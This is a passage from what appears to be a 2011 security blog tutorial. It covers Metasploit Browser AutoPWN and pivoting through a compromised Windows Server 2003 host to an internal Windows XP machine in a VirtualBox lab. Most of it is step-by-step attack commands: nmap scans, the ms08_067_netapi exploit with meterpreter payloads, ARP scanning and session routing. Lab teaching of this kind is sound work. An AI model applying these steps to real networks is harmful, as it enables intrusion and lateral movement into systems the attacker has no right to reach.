This will start a web server on the attacker’s IP address; furthermore, it will load a collection of modules that perform ‘browser fingerprinting’ on any client that visits the attacker’s malicious address.  At that moment, it will determine the type and version of the victim’s browser and exploit the visitor’s machine for the attacker to gain full control.
o The Browser AutoPWN will be preloaded with required settings.  You just have to set the URI path.  That is the path after the attacker’s IP address.  I just enter ‘/’  Also, you can set the SRVPORT to 80.  That is default port for a web server so the victim just has to visit the address without a port set following the address.
o The IP address that needs to be visited will be displayed when the web server is up and running.
o The address is
o I go to my Windows 7 machine and open IE 8 and visit the malicious site.
o Fortunately, we owned another box.

Monday, October 10, 2011

Pivoting into Other Systems with Metasploit

Pivoting is a powerful technique within the Metasploit Framework that allows a hacker to access a private subnet within a network.  For example, an attacker would compromise a host (ex: web server) that is accessible (i.e., routable IP address) and use that host as a staging point to pivot and compromise other systems in subnets that would not have been accessible from outside the network.  According to Metasploit, pivoting is a Meterpreter method that allows for the attack of other systems on a network through the Meterpreter console.

For this setup, I will use the following VirtualBox virtual machines:
·         BackTrack 5 R1
o   Attacker machine
·         Windows Server 2003
o   Web Server
o   Accessible (Public IP) –
o   Non-accessible (Private IP)  –
·         Windows XP
o   Host machine
In the following tutorial, I will use the BackTrack 5 machine to exploit the web server (Windows Server 2003) and set up a staging point on the server to pivot to the Windows XP host, which is only accessible to users inside the network.
First, I will map the network with Nmap to discover any accessible hosts:
·         nmap -sS
Once I discovered, I will scan for open ports and running services:
·         nmap -sV -O
The scan informs me that port 80 (web server port for public access) is running an Apache Web Server; along with port 135 and port 139.  I use the Windows netapi exploit, known as “Server Service Vulnerability.”
·         use windows/smb/ms08_067_netapi
·         show payloads
·         set PAYLOAD windows/meterpreter/bind_tcp
o   Bind shell is a payload that “binds” a command prompt to a listening port on the target machine, to which the attacker can then connect to maintain access to the machine.
·         show options
o   View what settings are needed.
·         set RHOST
·         show targets
o   To specify our specific target
·         set target 9
o   Target 9 is Windows Server 2003 SP1
·         exploit
Once the host is exploited, a meterpreter session is created and our machine has direct access to and control over the machine.  We confirm this by entering the ipconfig command to view the IP addresses.  The command returns:
· /
· /
Since we do not have access to the network, we will run an ARP scan and discover hosts that are up in the network.
·         run arp_scanner -r
With the discovered network and hosts, we will set up a route to have the private network’s packets (data) travel through our meterpreter session.  First, we have to background our meterpreter session.
·         background
·         route add 1
o   The command will route the subnet traffic through our meterpreter session id, 1.
o   You can view the session id by entering the command sessions -l
·         route print
o   To view the previously entered command
We need to do a port scan on the host discovered by arp_scanner to find a port over which we can set up communication.  First, we need to go back and access the auxiliary module for TCP port scanning.  The required setting is the remote host (RHOSTS).
·         back
·         use scanner/portscan/tcp
·         show options
·         set RHOSTS
·         run
Ports 25, 80, 135, and 139 are open.  We will use the RPC exploit on port 135 and subsequently have direct access to and control over the machine with a meterpreter session.
·         back
·         use windows/smb/ms08_067_netapi
·         show options
·         set RHOST
·         set PAYLOAD windows/meterpreter/bind_tcp
·         show options
·         show targets
o   To specify our specific target
·         set target 9
o   Target 3 is Windows XP SP2
·         exploit
A meterpreter session should be created and the attacker machine now has full control of the compromised host in the private subnet.  Type ipconfig to view the compromised host’s IP configuration.
Background the meterpreter session by entering the command background.
View your sessions by typing sessions.
The output will display the steps you have taken to get from your machine to the host in the private subnet under the “Connection” column.
  • ->
    • From the attacker machine to the web server
  • ->
    • From the web server to the XP host